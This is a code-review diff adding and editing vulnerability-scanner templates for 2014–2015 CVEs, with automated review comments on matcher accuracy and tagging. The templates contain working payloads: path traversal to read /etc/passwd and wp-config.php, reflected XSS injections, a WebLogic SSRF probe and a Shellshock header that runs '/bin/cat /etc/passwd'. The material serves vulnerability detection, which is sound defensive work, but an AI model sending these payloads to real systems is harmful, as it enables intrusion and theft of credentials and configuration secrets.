- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2014-4210
|
||||
|
||||
info:
|
||||
name: Weblogic SSRF in SearchPublicRegistries.jsp
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
tags: cve,cve2014,weblogic,oracle,ssrf
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
|
||||
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Connection refused"
|
||||
- "Socket Closed"
|
||||
- "content-type: unknown/unknown"
|
||||
part: body
|
||||
condition: or
|
|
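Review bot: `info` has no `description`, so nothing explains why `Connection refused`, `Socket Closed` or `content-type: unknown/unknown` in a 200 response indicates SSRF through the `operator` parameter. Add a description, and check whether the three strings joined with `condition: or` are specific enough, since `Connection refused` alone can appear on unrelated pages.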
@ -0,0 +1,30 @@
|
|||
id: CVE-2014-4513
|
||||
|
||||
info:
|
||||
name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4513
|
||||
tags: cve,cve2014,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</textarea></script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
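Review bot: the request injects payloads into MESSAGE, EMAIL and NAME, but the body matcher only looks for the MESSAGE payload (`</textarea></script><script>alert(document.domain)</script>`), so the EMAIL and NAME payloads are never verified. Either drop them from the path to keep the request minimal or add matchers for them. The path also ends in a stray `&` that can be removed.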
@ -0,0 +1,31 @@
|
|||
id: CVE-2014-4535
|
||||
|
||||
info:
|
||||
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "'></script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
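Review bot: the plugin directory in `path` is written `import–legacy–media` with en-dash characters (U+2013) rather than ASCII hyphens, so the request will not resolve to the plugin's directory and the template can never match. Replace both with `-` so the segment reads `import-legacy-media`, and re-run the template against a test install to confirm.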
@ -0,0 +1,31 @@
|
|||
id: CVE-2014-4536
|
||||
|
||||
info:
|
||||
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '"></script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
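Review bot: the body matcher cannot match what the request sends. The `contactId` payload decodes to `'></script><script>alert(document.domain)</script>` (single quote, `%27`), while the matcher word is `"></script><script>alert(document.domain)</script>` with a double quote; the two parameters that do start with `%22` carry `alert(document.cookie)` and no `</script>` prefix. Align the quote character in either the payload or the matcher so the template checks for the string it actually injects.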
@ -0,0 +1,29 @@
|
|||
id: CVE-2014-5368
|
||||
|
||||
info:
|
||||
name: WordPress Plugin WP Content Source Control - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/39287
|
||||
- https://www.cvedetails.com/cve/CVE-2014-5368
|
||||
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
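Review bot: the word matcher requires only `DB_NAME` and `DB_PASSWORD`, while the DukaPress template added in this same commit requires `DB_NAME`, `DB_PASSWORD`, `DB_USER` and `DB_HOST` for the same wp-config.php check. Use the same four-word set in both so the two templates have the same false-positive behaviour.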
@ -5,6 +5,9 @@ info:
|
|||
author: pentest_swissky
|
||||
severity: high
|
||||
description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications
|
||||
reference: |
|
||||
- http://www.kb.cert.org/vuls/id/252743
|
||||
- http://www.us-cert.gov/ncas/alerts/TA14-268A
|
||||
tags: cve,cve2014,rce
|
||||
|
||||
requests:
|
||||
|
@ -17,6 +20,7 @@ requests:
|
|||
- "{{BaseURL}}/cgi-bin/status/status.cgi"
|
||||
- "{{BaseURL}}/test.cgi"
|
||||
- "{{BaseURL}}/debug.cgi"
|
||||
- "{{BaseURL}}/cgi-bin/test-cgi"
|
||||
headers:
|
||||
Shellshock: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
||||
Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
|
||||
|
@ -28,5 +32,5 @@ requests:
|
|||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
|
|
|
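Review bot: the pattern `root:.*:0:0:` shown beside `root:[x*]:0:0:` leaves the password field unbounded, so it matches any line that contains `root:` followed anywhere later by `:0:0:`, not just a passwd entry. `root:[^:]*:0:0:` still accepts hashed or empty password fields but keeps the match inside the second field, which reduces false positives on pages that merely mention such strings. The same applies to the other templates in this commit that use `root:.*:0:0`.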
@ -0,0 +1,24 @@
|
|||
id: CVE-2014-6308
|
||||
|
||||
info:
|
||||
name: Osclass Security Advisory 3.4.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
reference: https://packetstormsecurity.com/files/128285/OsClass-3.4.1-Local-File-Inclusion.html
|
||||
tags: cve,cve2014,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
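Review bot: the `name` field reads "Osclass Security Advisory 3.4.1 - Local File Inclusion", which looks like an advisory title pasted in rather than a product and version; "Osclass 3.4.1 - Local File Inclusion" would match the naming used by the other templates. The block also has no `description`, and the regex `root:.*:0:0` lacks the trailing colon and the `part: body` line that the sibling templates carry.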
@ -0,0 +1,31 @@
|
|||
id: CVE-2014-8799
|
||||
|
||||
info:
|
||||
name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/35346
|
||||
- https://www.cvedetails.com/cve/CVE-2014-8799
|
||||
tags: cve,cve2014,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
- "DB_USER"
|
||||
- "DB_HOST"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2014-9094
|
||||
|
||||
info:
|
||||
name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
|
||||
tags: cve,2014,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(1)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
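Review bot: `tags: cve,2014,wordpress,xss,wp-plugin` uses `2014` where every other template in this commit uses `cve2014`, so tag-based selection on `cve2014` will skip this template. Change the second tag to `cve2014`.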
@ -0,0 +1,25 @@
|
|||
id: CVE-2015-1000012
|
||||
|
||||
info:
|
||||
name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
|
||||
author: daffainfo
|
||||
severity: high
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
|
||||
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,10 @@ info:
|
|||
name: ElasticSearch 1.4.0/1.4.2 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://blog.csdn.net/JiangBuLiu/article/details/94457980
|
||||
description: The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.
|
||||
reference: |
|
||||
- https://blog.csdn.net/JiangBuLiu/article/details/94457980
|
||||
- http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/
|
||||
tags: cve,cve2015,elastic,rce
|
||||
|
||||
requests:
|
||||
|
@ -43,7 +46,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
|
|
|
@ -0,0 +1,33 @@
|
|||
id: CVE-2015-1880
|
||||
|
||||
info:
|
||||
name: XSS in Fortigates SSL VPN login page
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-1880
|
||||
- https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page
|
||||
tags: cve,cve2015,xss,fortigates,ssl
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert('{{randstr}}')</script>"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
|
@ -4,14 +4,18 @@ info:
|
|||
name: Eclipse Jetty Remote Leakage
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-2080
|
||||
reference: |
|
||||
- https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
|
||||
- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
|
||||
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
|
||||
description: |
|
||||
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
|
||||
tags: cve,cve2015,jetty
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/"
|
||||
- "{{BaseURL}}"
|
||||
headers:
|
||||
Referer: \x00
|
||||
|
||||
|
|
|
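Review bot: the multi-line `reference:` list does not carry over the NVD link from the single-line `reference: https://nvd.nist.gov/vuln/detail/CVE-2015-2080` shown just above it. Keep the NVD URL as a fourth entry so the canonical CVE record stays linked. The `description` text also ends without a full stop.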
@ -0,0 +1,31 @@
|
|||
id: CVE-2015-2807
|
||||
|
||||
info:
|
||||
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
|
||||
tags: cve,cve2015,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Some files were not shown because too many files have changed in this diff